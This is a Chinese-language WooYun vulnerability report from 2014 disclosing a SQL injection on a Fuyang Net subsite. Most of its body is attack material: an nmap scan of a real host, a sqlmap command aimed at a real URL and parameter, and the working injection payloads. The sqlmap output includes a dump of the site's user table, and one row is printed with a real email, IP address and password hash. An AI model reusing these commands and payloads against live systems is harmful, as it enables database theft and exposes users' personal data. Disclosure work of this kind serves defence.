当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-063463

漏洞标题:阜阳网分站SQL injection可拖库

相关厂商:阜阳网

漏洞作者: JulyTornado

提交时间:2014-06-04 14:43

修复时间:2014-07-23 19:58

公开时间:2014-07-23 19:58

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-06-04: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-07-23: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

阜阳网分站SQL injection可拖库,并且密码明文保存

详细说明:

Interesting ports on 61.136.101.200:
Not shown: 1667 closed ports
PORT     STATE    SERVICE        VERSION
80/tcp   open     http           Apache httpd 2.2.4 ((Win32) PHP/5.2.3)
135/tcp  filtered msrpc
136/tcp  filtered profile
137/tcp  filtered netbios-ns
138/tcp  filtered netbios-dgm
139/tcp  filtered netbios-ssn
445/tcp  filtered microsoft-ds
593/tcp  filtered http-rpc-epmap
1025/tcp open     msrpc          Microsoft Windows RPC
1433/tcp open     ms-sql-s?
3306/tcp open     mysql          MySQL (unauthorized)
3389/tcp open     microsoft-rdp  Microsoft Terminal Service
4444/tcp filtered krb524
No exact OS matches for host (If you know what OS is running on it, see http://www.insecure.org/cgi-bin/nmap-submit.cgi).
TCP/IP fingerprint:
SInfo(V=4.11%P=i686-redhat-linux-gnu%D=6/3%Tm=538DC0E3%O=80%C=1)
TSeq(Class=TR%IPID=RD%TS=0)
T1(Resp=Y%DF=N%W=4000%ACK=S++%Flags=AS%Ops=MNWNNT)
T2(Resp=Y%DF=N%W=0%ACK=S%Flags=AR%Ops=)
T3(Resp=Y%DF=N%W=4000%ACK=S++%Flags=AS%Ops=MNWNNT)
T4(Resp=Y%DF=N%W=0%ACK=O%Flags=R%Ops=)
T5(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=)
T6(Resp=Y%DF=N%W=0%ACK=O%Flags=R%Ops=)
T7(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=)
PU(Resp=Y%DF=N%TOS=0%IPLEN=B0%RIPTL=148%RID=E%RIPCK=E%UCK=E%ULEN=134%DAT=E)
Service Info: OS: Windows


root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://60.172.12.41:309/Nav_lanmu.php?newsid=4096" --dump -D "0558_user" -T "uc_members"
    sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool
    http://sqlmap.org
[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 10:44:26
[10:44:26] [INFO] resuming back-end DBMS 'mysql' 
[10:44:26] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: newsid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: newsid=4096' AND 9216=9216 AND 'zLjT'='zLjT
    Type: UNION query
    Title: MySQL UNION query (NULL) - 4 columns
    Payload: newsid=4096' LIMIT 1,1 UNION ALL SELECT NULL, NULL, NULL, CONCAT(0x3a7169633a,0x6a586e614146614f6d6b,0x3a6b6e733a)#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: newsid=4096' AND SLEEP(5) AND 'Tojb'='Tojb
---
[10:44:27] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.17
back-end DBMS: MySQL 5.0.11
[10:44:27] [INFO] fetching columns for table 'uc_members' in database '0558_user'
[10:44:27] [INFO] fetching entries for table 'uc_members' in database '0558_user'
[10:44:27] [WARNING] large output detected. This might take a while
[10:44:41] [INFO] analyzing table dump for possible password hashes
recognized possible password hashes in column 'password'. Do you want to crack them via a dictionary-based attack? [Y/n/q] n
Database: 0558_user
Table: uc_members
[13325 entries]
+--------+---------+---------+--------+-----------------+----------------------------------+--------+----------+------------+-----------------+----------------------------------+-----------+-------------+----------------------+---------------+
| uid    | myid    | myidkey | salt   | regip           | email                            | mail_v | secques  | regdate    | username        | password                         | mail_flag | lastloginip | password_str         | lastlogintime |
+--------+---------+---------+--------+-----------------+----------------------------------+--------+----------+------------+-----------------+----------------------------------+-----------+-------------+----------------------+---------------+
[10:45:53] [WARNING] console output will be trimmed to last 256 rows due to large table size
| 13262  | <blank> | <blank> | b4d037 | 114.96.60.71    | 844234832@qq.com                 | 1      | <blank>  | 1294987771 | E团购             | 7578b79806dd41ece401d7e188438594 | 5         | 0           | <blank>              | 0             |

漏洞证明:

sys版本,db信息:

QQ截图20140604120254.png


随便找个用户到主站登陆下:

QQ截图20140604120254.png


SQLMap跑出的用户列表,逗比的是密码除了md5以外还有明文。。。

QQ截图20140604120026.png

修复方案:

过滤,去掉数据库明文,你们比我专业。。。。

版权声明:转载请注明来源 JulyTornado@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞评价:

评论